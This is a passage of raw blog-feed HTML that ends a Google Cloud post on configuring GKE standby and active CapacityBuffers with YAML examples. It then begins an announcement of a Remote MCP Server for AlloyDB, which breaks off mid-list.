&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gain declarative control:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Replace complex balloon pod workarounds with the simple, native declarative CapacityBuffers API, explicitly stating how much headroom you need, and letting GKE handle the rest.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unico.max-1000x1000.jpg"
        
          alt="unico"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p data-block-key="xc99z"&gt;&lt;i&gt;“Using GKE standby capacity buffers has lowered our time-to-ready from several minutes to 30 seconds at a very affordable price.”&lt;/i&gt;&lt;br/&gt; &lt;i&gt;- Pedro Spagiari, Chief Architect at Unico&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to improve your performance and save on costs?&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Start by defining a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;CapacityBuffer&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; resource in your cluster to specify your target buffer size.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Try balancing between standby buffers to reduce pod scheduling latency for sustained loads, and active buffers to address immediate unpredictable capacity needs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s look at an example of how to configure buffers for a Deployment while also using custom ComputeClasses.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Basic setup&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beginning with some basic setup, create a namespace:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: v1\r\nkind: Namespace\r\nmetadata:\r\n  name: my-namespace&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d13052e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then, create a custom ComputeClass (optional):&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: cloud.google.com/v1\r\nkind: ComputeClass\r\nmetadata:\r\n  name: my-ccc\r\n  namespace: my-namespace\r\nspec:\r\n  # Buffers will also be created according to these priorities \r\n  priorities:\r\n  - machineFamily: n4\r\n  - machineFamily: n4d\r\n  - machineFamily: c4\r\n  - machineFamily: c4d\r\n  nodePoolAutoCreation:\r\n    enabled: true&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d1305bb0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Define the buffer unit size&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can use a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PodTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;a&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;s a reference for the buffer unit size. You can also create a buffer for a  specific deployment or any object that defines &lt;/span&gt;&lt;a href="https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#scale-subresource" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;scale subResource&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Defines the resource requirements for one unit of buffer.\r\napiVersion: v1\r\nkind: PodTemplate\r\nmetadata:\r\n  name: my-buffer-unit-template\r\n  namespace: my-namespace\r\ntemplate:\r\n  spec:\r\n    terminationGracePeriodSeconds: 0\r\n    tolerations:\r\n      # Optional: Ensures buffer pods can land on any node.\r\n      - key: &amp;quot;node-role.kubernetes.io/master&amp;quot;\r\n        operator: &amp;quot;Exists&amp;quot;\r\n        effect: &amp;quot;NoSchedule&amp;quot;\r\n    containers:\r\n    - name: buffer-container\r\n      image: registry.k8s.io/pause:3.9\r\n      resources:\r\n        requests:\r\n          cpu: &amp;quot;1&amp;quot;\r\n          memory: &amp;quot;1Gi&amp;quot;\r\n        limits:\r\n          cpu: &amp;quot;1&amp;quot;\r\n          memory: &amp;quot;1Gi&amp;quot;\r\n    # Optional: Using buffers with a custom ComputeClass / \r\n    # controls the properties of the nodes GKE provisions. \r\n    nodeSelector:\r\n      cloud.google.com/compute-class: my-ccc&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0c5b430&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Create buffers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Lastly, create a&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; CapacityBuffer&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; object by referring to our &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PodTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Here, you create a standby buffer of 50 CPUs and 50 GB of RAM:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: autoscaling.x-k8s.io/v1beta1\r\nkind: CapacityBuffer\r\nmetadata:\r\n  name: my-standby-buffer-resource-limits\r\n  namespace: my-namespace\r\n  annotations:\r\n    # Optional: Time after which buffer nodes are suspended.\r\n    # Default is 5 minutes. \r\n    buffer.gke.io/standby-capacity-init-time: &amp;quot;5m&amp;quot;\r\n    # Optional: Time after which standby buffers are recreated.\r\n    # Default is 1 day, &amp;quot;never&amp;quot; avoids refreshing. \r\n    buffer.gke.io/standby-capacity-refresh-frequency: &amp;quot;1d&amp;quot;\r\nspec:\r\n  podTemplateRef:\r\n    name: my-buffer-unit-template\r\n  # The desired state is 20 standby buffer units.\r\n  # When a standby buffer gets used, a new one gets created.\r\n  limits:\r\n    cpu: &amp;quot;50&amp;quot;\r\n    memory: &amp;quot;50Gi&amp;quot;\r\n  provisioningStrategy: &amp;quot;buffer.gke.io/standby-capacity&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0c5bfa0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;And an active buffer of seven 5 CPUs and 5 GB of RAM (optional):&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: autoscaling.x-k8s.io/v1beta1\r\nkind: CapacityBuffer\r\nmetadata:\r\n  name: my-active-buffer-resource-limits\r\n  namespace: my-namespace\r\nspec:\r\n  podTemplateRef:\r\n    name: my-buffer-unit-template\r\n  # The desired state is 2 active buffer units.\r\n  # When an active buffer gets used, a new one gets created. \r\n  limits:\r\n    cpu: &amp;quot;5&amp;quot;\r\n    memory: &amp;quot;5Gi&amp;quot;\r\n  provisioningStrategy: &amp;quot;buffer.x-k8s.io/active-capacity&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0c5bfd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, apply the above objects to your cluster. That’s it!&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now, any existing and future deployments that can schedule on the space reserved by the buffers will benefit from faster pod scheduling latencies.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Test the buffers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;can check on the status of your buffers. In Kubernetes, suspended nodes can be identified by condition&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; Suspended&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl get nodes -o custom-columns=\&amp;#x27;NAME:.metadata.name,SUSPENDED:.status.conditions[?(@.type==&amp;quot;Suspended&amp;quot;)].status\&amp;#x27;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0c5b640&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Expect the following kind of output, and w&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ait for the standby buffers to get suspended.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;NAME                                                  SUSPENDED\r\ngke-my-cluster-nap-n4-standard-8-k960-...-ffbx   False  # Node has been resumed.\r\ngke-my-cluster-nap-n4-standard-4-k960-...-h2x4   &amp;lt;none&amp;gt; # Node was never suspended.\r\ngke-my-cluster-nap-n4d-standard-8-1cip-...-74jf  True   # Node is suspended.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0c5bd60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To test the buffers, create a deployment and scale it.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n  name: my-deployment\r\n  namespace: my-namespace\r\nspec:\r\n  replicas: 1\r\n  selector:\r\n    matchLabels:\r\n      app: my-deployment\r\n  template:\r\n    metadata:\r\n      labels:\r\n        app: my-deployment\r\n    spec:\r\n      containers:\r\n      - name: busybox\r\n        image: busybox\r\n        command: [&amp;quot;sleep&amp;quot;, &amp;quot;inf&amp;quot;]\r\n        resources:\r\n          requests:\r\n            cpu: &amp;quot;500m&amp;quot;\r\n            memory: &amp;quot;500Mi&amp;quot;\r\n      # Optional: Using buffers with a custom ComputeClass /\r\n      # controls the properties of the nodes GKE provisions. \r\n      nodeSelector:\r\n        cloud.google.com/compute-class: my-ccc&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0c5bcd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling this deployment to two replicas allows them to be assigned to the active buffer for immediate scheduling. The active buffer is then immediately refilled from the standby buffer. Simultaneously, the standby buffer initiates the provisioning of new nodes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you further scale the deployment to 50 replicas, scheduling all of them on the standby buffer occurs once the nodes resume. New nodes provisioned to refill the standby buffer briefly function as active buffers providing a temporary active standby boost. Therefore, when further scaling the deployment to 100 replicas during this time, you may notice that new replicas benefit from immediate scheduling.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE standby buffer best practices&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When working with GKE standby buffers, here are a few things to consider:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Define standby buffers that are sufficient to cover the extended load you expect to encounter, so that buffers can refill in the background from a cold start. A sufficiently sized standby buffer can drop your max pod scheduling latency to the time it takes to resume a node — around 30 seconds.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;When the buffer starts to get used and is refilled, new buffer nodes initially swing into an active state prior to suspending. This helps to boost active capacity during a prolonged load.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;If your application requires the lowest possible pod scheduling latency, define an active buffer size that is sufficient to cover any initial spikes you expect to encounter until standby buffer nodes are able to resume. The system prioritizes refilling the active buffer by consuming the standby buffer. A sufficiently sized active buffer and a sufficiently sized standby buffer can help you achieve one-second pod scheduling latency for a fraction of the cost of overprovisioning.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Experiment with different buffer sizes to get the best result for your workload.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help, we created a simulator to help with sizing the buffers to achieve your performance targets, available at &lt;/span&gt;&lt;a href="https://github.com/gke-labs/buffers-simulator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://github.com/gke-labs/buffers-simulator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Try it yourself!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Active and standby buffers in GKE provide a native solution for low-latency and cost-effective workload scaling by maintaining warm and standby capacity buffers. By circumventing slow node cold starts, buffers help performance-critical applications handle sudden traffic spikes. This feature replaces complex manual workarounds like balloon pods with a simple, declarative API, and allows for fixed, percentage-based, or resource-limited buffering strategies to help maintain strict service-level objectives cost-effectively and without over-provisioning for peak.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Standby buffers are available for GKE clusters running version 1.36.0-gke.2253000 or later. To get started with buffers, check out the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/capacity-buffer"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Mon, 01 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/containers-kubernetes/gke-standby-buffers-speed-up-autoscaling-for-less-spend/</guid><category>GKE</category><category>Containers &amp; Kubernetes</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Cloud_blog___Hero_23_2436x1200.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Introducing the GKE standby buffer: Improve node startup times without blowing your budget</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Cloud_blog___Hero_23_2436x1200.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/containers-kubernetes/gke-standby-buffers-speed-up-autoscaling-for-less-spend/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Eyal Yablonka</name><title>Product Manager, Google Kubernetes Engine</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Konrad Kurdej</name><title>Staff Software Engineer, Google Kubernetes Engine</title><department></department><company></company></author></item><item><title>The fully-managed Remote MCP Server for AlloyDB is now Generally Available</title><link>https://cloud.google.com/blog/products/data-analytics/alloydb-remote-mcp-server-ga-secure-ai-agent-access-to-your-data/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AI agents possess incredible reasoning capabilities and can perform increasingly complex actions. But the reliability of agentic outcomes depends entirely on the quality of the context they can access&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;— context that is frequently locked away in operational databases.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To bridge this gap, we are excited to announce the Remote Model Context Protocol (MCP) Server for &lt;/span&gt;&lt;a href="https://cloud.google.com/products/alloydb?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is now generally available. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Model Context Protocol (MCP) is an open-source standard that gives LLMs a secure, consistent way to connect to external data sources. As part of Google Cloud’s recent rollout of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/google-managed-mcp-servers-are-available-for-everyone?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;50+ Google-managed MCP servers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this new integration makes it easier than ever for both interactive and autonomous agents to securely harness the full power of your enterprise data. For example, you can now ask an AI agent for an up-to-the-millisecond view of your delivery fleet by connecting it to your real-time logistics data in AlloyDB, avoiding inaccuracies due to stale data and reducing the need for manual reporting.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why AlloyDB is the strong foundation for agentic apps&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By connecting MCP to AlloyDB, your agents get access to the premier database built for enterprise-grade AI. AlloyDB delivers the scale, speed, and intelligence required for the most demanding agentic workloads:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Supercharged vector performance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Scale to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/choose-index-strategy#:~:text=Scales%20well%20to%2010B%20vectors"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;over 10 billion vectors&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; at up to 6x the speed of standard PostgreSQL for vector queries (and up to 10x faster for &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/filtered-vector-search-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;filtered queries&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) with the ScaNN index.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Advanced search and reranking:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Power multimodal applications with hybrid search via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/create-rum-index"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RUM&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (in Preview) and intelligent reranking through Reciprocal Rank Fusion (RRF) or &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/rank-rerank-search-results-rag"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Platform models&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Real-time intelligence:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Efficiently generate &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/generate-manage-auto-embeddings-for-tables"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;millions of embeddings&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; using built-in &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/ai-query-engine-landing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to facilitate low-latency, real-time agentic experiences.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified data access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Give agents a single PostgreSQL interface to seamlessly join operational data in AlloyDB with analytical data in BigQuery or archived data in Iceberg tables via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/bigquery-view-alloydb-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lakehouse Federation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enterprise-grade scale:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rest easy with a &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb/sla?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;99.99% SLA&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/overview#automatic"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;autopilot&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; database optimizations, and auto-scaling read pools with up to 20 nodes. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why Remote MCP matters for AlloyDB&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Local MCP servers are great for local development, but communicating over standard input/output (stdio) streams becomes difficult when you scale to production workloads. It is both architecturally complex and administratively burdensome to provision and manage all of the infrastructure and security guardrails you need to run agents for high-value use cases that interact with sensitive operational data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Remote MCP Server for AlloyDB runs on fully-managed Google Cloud infrastructure and exposes an HTTP endpoint that connects your AI applications to your data. This solves key challenges for teams building agents on PostgreSQL:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Centralized discovery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Find, secure, and manage your database's MCP server using &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/agent-registry/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Registry&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Fully-managed HTTP endpoints&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: No need to deploy or maintain the infrastructure required for connectivity. Configure your agent to use the endpoint to get started.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Fine-grained authorization&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Instead of using shared database passwords or API keys, you use &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Identity and Access Management (IAM)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to restrict agents to specific tables, schemas, or views. With the read-only execute SQL tool, you can prevent your agent from making accidental changes and deletions from your database. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Operational instance management&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The AlloyDB toolset gives agents the ability to do more than run queries. Agents can update instances, export and import data, create backups, and restore clusters.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
